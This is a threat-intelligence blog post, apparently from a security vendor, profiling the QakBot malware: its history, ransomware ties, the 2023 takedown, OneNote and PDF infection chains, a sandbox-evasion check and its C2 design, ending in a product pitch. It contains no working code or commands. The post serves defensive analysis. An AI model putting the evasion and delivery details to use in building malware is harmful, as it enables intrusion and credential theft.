QakBot, One of The Most Observed Malware

Qakbot, a versatile second-stage malware endowed with backdoor capabilities, was initially designed as a credential stealer. Remarkably, it remained operational till present day. It is so relevant that in ProofPoint’s 2022 Phishing report, along with Emotet, QakBot was one of the top malware families observed. Again, in the 2023 Spring period, QakBot was the most common malware family.

Classified as a credential stealer, banking trojan, worm, and Remote Access Trojan (RAT), Qakbot steals sensitive data and endeavors to propagate itself across other systems within the network. Furthermore, Qakbot boasts Remote Code Execution (RCE) capabilities, empowering attackers to conduct manual attacks to accomplish secondary goals, such as scanning compromised networks or introducing ransomware. To put it simply, Qakbot is a modular malware that encompasses a multitude of malicious functionalities.

Figure 1. SOCRadar Cyber Threat Intelligence Module, Threat Actor/Malware TabFigure 1. SOCRadar Cyber Threat Intelligence Module, Threat Actor/Malware Tab

Of course, this versatile malware has served as a helpful weapon among various threat actors. Prominent ransomware operations, most notably Black Basta, alongside other major ransomware operators, including REvil, LockBit, and Conti, have harnessed Qakbot to spread significant ransomware strains over the years. The diverse modules of Qakbot facilitate automated targeting of financial information, locally stored emails, system passwords or their hashes, website credentials, web browser cache and cookies. 

Moreover, the malware can capture keystrokes to pilfer entered credentials. Security experts observed attacks utilizing Qakbot malware to breach networks and deploy ransomware in under half a day. These capabilities of the malware underscored a growing trend of collaboration in cybercrime, wherein groups like the Qakbot malware collective expand their influence by vending initial access through their malware to other threat actors.

More Than a Decade Long Activity

Unearthed in 2008, Qakbot has witnessed continuous enhancements throughout its existence, with its prevalence fluctuating in tandem with its update cycles. Subsequent to the availability of updated versions in 2015, Qakbot experienced a resurgence; in 2020, security analysts observed a staggering 465 percent surge in its year-over-year share of cyber assaults following the release of a novel Qakbot variant (BlackBerry). The year 2021 saw Qakbot leveraged in the significant cyber intrusion targeting JBS, which disrupted the company’s meat production facilities and necessitated an $11 million ransom payment. Throughout 2022, numerous operations conducted by the Black Basta ransomware group integrated Qakbot. Even in 2023, new vectors for Qakbot distribution and new C2 servers have emerged, attesting to the persistent nature of the threat.

Figure 2. QakBot Infection Rate. (Trellix)Figure 2. QakBot Infection Rate. (Trellix)

According to Trellix research in early 2023, The propagation of this malware primarily occurred through phishing emails and malicious attachments. However, it is noteworthy that Qakbot has also been identified as a secondary payload from other botnets like Emotet. As mentioned above, Qakbot has been utilized to deploy ransomware strains like Prolock, Egregor, and DoppelPaymer. Moreover, it was previously linked with TA570, which frequently employs this malware as an initial entry point in their campaigns. Despite persistent efforts spanning over a decade to combat its impact, Qakbot continues to pose a substantial threat to individuals and organizations worldwide.

Figure 3. Global heatmap of Qakbot detection in Q1 2023. (Trellix)Figure 3. Global heatmap of Qakbot detection in Q1 2023. (Trellix)

Numerous Qakbot infections have been identified, with significant outbreaks detected across multiple countries. Notably, the United States, India, Turkey, and Thailand have witnessed considerable infections. Interestingly, these campaigns are not aimed at a specific industry or nation. Among the sectors affected, the Banking, Financial, and Wealth Management sectors exhibited the highest count of infected IoCs, followed by Government and Outsourcing.

Recent Dismantle of Qakbot Infrastructure 

Lastly, on August 29, 2023, an operation marked one of the largest-ever U.S.-led enforcement actions against a botnet, the FBI declared the dismantling of the Qakbot botnet through a collaborative international law enforcement effort. This operation not only involved the confiscation of the botnet’s infrastructure but also the removal of malicious software from compromised devices.

In the initiative named Operation Duck Hunt, which took place over the weekend, the FBI skillfully rerouted the botnet’s communication network to servers under its authority. This strategic move enabled agents to pinpoint around 700,000 devices the botnet had compromised.

While this development will significantly disrupt the QakBot operation, one detail that should not be forgotten is that this operation does not involve arresting malware operators. Therefore, as in the past, QakBot can return in the same form or another, even if it is less dangerous for a while.

New Vectors to Distribute

An action taken by Microsoft in the past year, the disabling of macros from documents downloaded from the internet by default in Office changed many malware distribution methods. As Microsoft states: “VBA macros are a common way for malicious actors to gain access to deploy malware and ransomware. Therefore, to help improve security in Office, we’re changing the default behavior of Office applications to block macros in files from the internet.” However, threat actors were able to adapt quickly to this new situation. Shortly after this decision, malicious OneNote attachments were caught on the radar of the entire security community as a common vector. QakBot also appeared as one of the malware distributed over this vector.

Figure 4. Mails distributing malicious .one attachments for QakBot. (Sophos)Figure 4. Mails distributing malicious .one attachments for QakBot. (Sophos)

Starting from January 31, Qakbot adopted the utilization of OneNote .one documents, also known as “Notebooks” in Microsoft’s terminology, as part of its attack strategy. During this period, Sophos identified two concurrent spam campaigns orchestrated by Qakbot. In the first campaign, the malicious emails incorporate a hyperlink that prompts the recipient to download a weaponized .one file. Notably, these versions of the malicious spam messages feature the recipient’s surname repeated within the subject line, although the content of the messages is generally lacking in personalization. The second campaign involves a technique referred to as “message thread injections.” In this scenario, participants in an existing conversation receive a “reply-all” message, seemingly originating from the user of an infected computer, accompanied by a tainted OneNote notebook attachment.

How Does the QakBot Function?

Qakbot predominantly propagates through the manipulation of emails and the use of social engineering strategies. As mentioned above, earlier this year, Qakbot adopted the method of spreading through OneNote files. However, a subsequent shift also occurred in March, where Qakbot started utilizing PDF and HTML files as well to serve as the initial vectors of attack. These files were employed to download additional stage files, ultimately culminating in the distributing of the final malicious payload. Malicious entities frequently use these file formats to target and compromise users.

Figure 5. Overview of the infection chain, the chain may slightly vary in each attack.Figure 5. Overview of the infection chain, the chain may slightly vary in each attack.

The .One, PDF, and HTML attachments in these spam mails can redirect victims to downloading a malicious ZIP file that is dropping a VBS script or run a Powershell command with an obfuscated JS file in PDFs that leads to downloading another payload. Thus the actual QakBot payload is loaded into the system in this manner. 

In an analysis from Zscaler researchers, it is noted that some QakBot campaigns aim to gain initial access through .xll files. The consistent element across these various initial access strategies, which differ from one campaign to another, is that they kick off with a spam email carrying a malicious attachment. These attacks then progress to incorporate file formats commonly employed in daily use, primarily those associated with Microsoft products.

Moving on to the subsequent phase of the attack, a script file is extracted from the compressed archive. This script file subsequently initiates a PowerShell command, establishing communication with a C2 server, as illustrated in the provided example. Following this communication, the QakBot payload is fetched and executed.

Figure 6. Deobfuscated PowerShell command. (Zscaler)Figure 6. Deobfuscated PowerShell command. (Zscaler)

Figure 7. It downloads the files to the system with HTTP GET requests to various pages.Figure 7. It downloads the files to the system with HTTP GET requests to various pages.

Upon execution of a sample, Qakbot checks to determine if it operates within the Windows Defender Sandbox environment. This assessment is carried out using the GetFileAttributeW() function. More precisely, the malware scans for the existence of a directory labeled “C:\INTERNAL__empty.” Should this directory be identified, Qakbot proceeds to terminate itself. This behavior underscores the malware’s adeptness at eluding analysis within confined, sandboxed environments, serving as a testament to its advanced nature.

Figure 8. Windows Defender Sandbox evasion checks by QakBot. (Zscaler)Figure 8. Windows Defender Sandbox evasion checks by QakBot. (Zscaler)

Furthermore, the process of unpacking the Qakbot malware is relatively uncomplicated in the analyzed sample, making use of the VirtualAlloc() API to allocate memory space for its execution. Upon unpacking, the payload unveils two distinct components housed within the Bitmap section: COMPONENT_07 and COMPONENT_08. Within COMPONENT_07 lies the encrypted campaign ID, while COMPONENT_08 contains the encrypted configurations for the Qakbot C2.

  • Of note, Qakbot operators employ a clever strategy to ensure the continuous functionality of their C2 infrastructure, effectively sidestepping security measures. Qakbot repurposes compromised victim machines into additional C2 nodes to maintain its robustness. QakBot’s C2 network is structured with a hierarchical design. In this arrangement, lower-level C2 nodes, which often consist of machines from prior victims, establish communication with higher-level Tier 2 C2 nodes. These Tier 2 nodes are hosted on Virtual Private Server (VPS) providers in Russia. Over a quarter of these C2 nodes remain operational for less than a day, and around half of them are active for no more than a week.

After unpacking, QakBot may initiate communication with its C2 server using HTTP and TLS. The core protocol involves the utilization of a JSON object that is enclosed within an encrypted message. This encrypted message is subsequently encoded in base64 format. 

Figure 9. An example of an HTTP POST request sent by QBOT to its C2. (Sophos)Figure 9. An example of an HTTP POST request sent by QBOT to its C2. (Sophos)

QakBot receives instructions from its C2 via this established communication channel. In addition to administrative commands, this modular malware might incorporate functionalities like a reverse shell server, proxy support and various other capabilities. At this point, QakBot is installed on the victim system as a Remote Access Trojan, enabling the attacker to take its desired action.


To sum up, QakBot is still active and remains a threat to organizations and users to consider. The strategic action taken by Microsoft in the past year, aimed at enhancing Windows security by disabling macros from the internet by default, forced the threat actors to evolve tactics once again. While this move intended to bolster cybersecurity, threat actors swiftly pivoted to new distribution vectors, with malicious OneNote attachments emerging as a prominent avenue. This adaptation demonstrated the agility of cybercriminals in circumventing security measures to achieve their goals. QakBot’s integration of OneNote documents into its attack strategy exemplifies the dynamic and innovative techniques threat actors employ to infiltrate systems and networks.

Thus, it is the responsibility of organizations and users to take proactive measures against threat actors and stay one step ahead of them. In this endeavor, SOCRadar can help you establish this proactive understanding of security, here is how:

  1. Threat Detection and Analysis: SOCRadar collects data from every part of the Internet and can detect IoCs associated with QakBot, like domain names, IP addresses, hashes, and more. On the SOCRadar Platform, you can access over 50,000 QakBot-related IoCs and integrate them into your security systems.
  2. Vulnerability Intelligence: SOCRadar Vulnerability Intelligence may help your organization to identify vulnerabilities in your systems that could be exploited by malware like QakBot. By patching or securing these vulnerabilities, the risk of infection can be reduced.
  3. Real-time Alerts: Beside the Vulnerability Intelligence included in SOCRadar Platform, we provide real-time alerts when we detect any potential threats related to your assets that may become an initial access method for various threat actors. This enables security teams to respond promptly to mitigate the risk.
  4. Malware Analysis: SOCRadar Platform also may help you analyze the various malware strains or suspected files, including .EML files that are the primary vector for malware infection like QakBot. By presenting a detailed report as well as whether the file is malicious or not, we provide insights into the TTPs used by the malware, which helps in understanding its modus operandi.

The post QakBot, One of The Most Observed Malware appeared first on SOCRadar® Cyber Intelligence Inc..

Article Link: QakBot, One of The Most Observed Malware